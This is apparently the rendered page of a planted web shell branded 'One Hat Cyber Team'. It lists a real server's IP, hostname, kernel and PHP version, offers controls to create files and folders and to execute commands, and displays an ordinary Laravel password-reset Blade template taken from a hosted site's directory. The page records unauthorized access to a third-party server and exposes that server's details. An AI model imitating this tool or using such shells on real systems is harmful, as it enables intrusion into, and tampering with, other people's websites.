⚝
One Hat Cyber Team
⚝
Your IP:
216.73.217.31
Server IP:
95.217.99.93
Server:
Linux sv1.sonichosted.com 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.2.29
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
lifestylescentra
/
www
/
resources
/
views
/
auth
/
View File Name :
reset-password.blade.php
@extends('website.layout.master') @section('content') <!--============================ BREADCRUMBS START =============================--> @include('components.website.breadcrum', ['title' => __('Reset Password')]) <!--============================ BREADCRUMBS END =============================--> <!--============================ LOGIN START =============================--> <section class="wsus__login mt_120 xs_mt_100 mb_120 xs_mb_100"> <div class="row"> <div class="col-lg-6 col-xl-7 wow fadeInLeft"> <div class="wsus__login_img"> <img src="{{ asset($utility?->reset_password_image) }}" alt="login" class="img-fluid w-100"> </div> </div> <div class="col-lg-6 col-xl-5 wow fadeInRight"> <div class="wsus__login_contant"> <h2>{{ __('Reset Password') }}</h2> <form action="{{ route('reset-password-store', $token) }}" class="wsus__login_form" Method="POST"> @csrf <div class="form-group inflanar-form-input"> <input class="ecom-wc__form-input" type="email" name="email" placeholder="{{ __('Email') }}" value="{{ $user->email }}"> </div> <div class="form-group inflanar-form-input mg-top-20"> <input class="ecom-wc__form-input" type="password" name="password" placeholder="{{ __('Password') }}"> </div> <div class="form-group inflanar-form-input mg-top-20"> <input class="ecom-wc__form-input" type="password" name="password_confirmation" placeholder="{{ __('Confirm Password') }}"> </div> @if ($setting->recaptcha_status == 'active') <div class="form-group inflanar-form-input mg-top-20"> <div class="g-recaptcha" data-sitekey="{{ $setting->recaptcha_site_key }}"></div> </div> @endif <button type="submit" class="common_btn common_btn_2">{{ __('Reset Password') }}</button> <a href="{{ route('login') }}" class="forgot_pass bottom-0">{{ __('Back To Login') }}</a> </form> </div> </div> </div> </section> <!--============================ LOGIN END =============================--> @endsection